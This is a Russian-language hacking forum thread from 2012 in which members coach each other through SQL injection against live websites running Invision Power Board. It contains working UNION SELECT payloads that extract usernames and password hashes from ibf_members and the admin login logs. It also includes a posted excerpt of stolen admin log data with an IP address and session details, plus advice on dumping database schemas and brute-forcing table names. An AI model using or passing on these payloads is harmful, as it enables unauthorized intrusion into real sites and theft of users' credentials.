07.01.2012, 19:42
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Чакэ
infor
n
ation написано с ошибкой.
При такой опечатке выдало бы другую ошибку.
faza02,
hex тебе не поможет, я думаю фильтрацию точки обойти нельзя. Попробуй брутить имена таблиц(стандартные users, admin, members и т.д.), смотри на движки и узнай имена таблиц здесь:
http://dbitems.wen.ru
|
|
|
07.01.2012, 19:45
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Сообщение от faza02
чакэ, да, ошибся, но запрос не изменило
Ereee, как можно послать запрос? hex? он не сработал
как я такое бревно не заметил select ololo from information..
|
|
|
|
07.01.2012, 19:53
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
Здаствуйте!
Не могу найти пасс админа. Итак, базы:
Сообщение от None
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,addr,ban_clic k,ban_stat,ban_view,banner,city,firm,firmtov,forum ,fpage,fronthref,frontpage,golos,ibf_acp_help,ibf_ admin_login_logs,ibf_admin_logs,ibf_admin_permissi on_keys,ibf_admin_permission_rows,ibf_admin_sessio ns,ibf_announcements,ibf_api_log,ibf_api_users,ibf _attachments,ibf_attachments_type,ibf_badwords,ibf _banfilters,ibf_bbcode_mediatag,ibf_bulk_mail,ibf_ cache_store,ibf_cal_calendars,ibf_cal_events,ibf_c aptcha,ibf_components,ibf_conf_settings,ibf_conf_s ettings_titles,ibf_contacts,ibf_content_cache_post s,ibf_content_cache_sigs,ibf_converge_local,ibf_co re_applications,ibf_core_hooks,ibf_core_hooks_file s,ibf_core_incoming_emails,ibf_core_item_markers,i bf_core_item_markers_storage,ibf_core_like,ibf_cor e_like_cache,ibf_core_rss_imported,ibf_core_share_ links,ibf_core_share_lin
Нашел что-то похожее на правду в базе ibf_admin_login_logs:
Сообщение от None
497:95.26.233.1:Lisaveta:1293725743:1:a:2:{s:3:"ge t";a:3:{s:6:"adsess";s:32:"adf50898331c99087d57500 13949a5d6";s:3:"act";s:5:"login";s:4:"code";s:14:" login-complete";}s:4:"post";a:3:{s:7:"qstring";s:91:"old _adsess=adf50898331c99087d5750013949a5d6§ion=c ontent&act=mem&code=search";s:8:"username";s:8:"Li saveta";s:8:"password";s:6:"*****n";}},
По структуре:
Сообщение от None
admin_id,admin_ip_address,admin_username,admin_tim e,admin_success,admin_post_details
|
|
|
|
07.01.2012, 19:55
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
2York,
-1'+union+select+1,concat(name,0x3a,password),3+fro m+ibf_members+limit+0,1--+a
|
|
|
|
07.01.2012, 19:58
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Сообщение от York
Здаствуйте!
Не могу найти пасс админа. Итак, базы:
Нашел что-то похожее на правду в базе ibf_admin_login_logs:
По структуре:
сливай бд через columns, а не tables. а там заодно тяни table_name & table_schema сразу будет видно что где лежит..
|
|
|
|
07.01.2012, 20:07
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
Попродробней что значит тяни и как тянуть?) Ссылка такая получилась - -223+union+select+1,group_concat(admin_id,0x3a,admi n_ip_address,0x3a,admin_username,0x3a,admin_time,0 x3a,admin_success,0x3a,admin_post_details),3,4,5,6 +from+ibf_admin_login_logs
|
|
|
|
07.01.2012, 21:04
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от York
Попродробней что значит тяни и как тянуть?) Ссылка такая получилась - -223+union+select+1,group_concat(admin_id,0x3a,admi n_ip_address,0x3a,admin_username,0x3a,admin_time,0 x3a,admin_success,0x3a,admin_post_details),3,4,5,6 +from+ibf_admin_login_logs
хрен ты там найдешь логин админа..они совсем в другой таблице...изучи сначала структуру ИПБ потом изучи синтаксис мускуля..
|
|
|
|
07.01.2012, 22:07
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
York
почитайте статьи, срач запрещено
NZT, вопросы по сканерам и по крекерам интернета отправьте в гугл =\
|
|
|
|
07.01.2012, 23:33
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
С нами:
10409033
Репутация:
3
|
|
есть скуля, все выводится и работает но посылая например такой запрос
SELECT `name` FROM `users` WHERE `user_id` = 1
сервер переводит имя таблицы в верхний регистр (USERS)
т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.
вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине
|
|
|
|
08.01.2012, 00:24
|
|
Новичок
Регистрация: 31.12.2011
Сообщений: 25
С нами:
7561046
Репутация:
0
|
|
Konqi со всем уважением к форуму я не могу найти ответ в гугле, я искал до и после того как задать свой ворпрос здесь и ответа не нашел. Я не знаю как мне решить проблему , можно я еще раз задам здесь свой вопрос?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.jpg?2969725){kind=avatar}
Похожие темы
Комбинированный вид
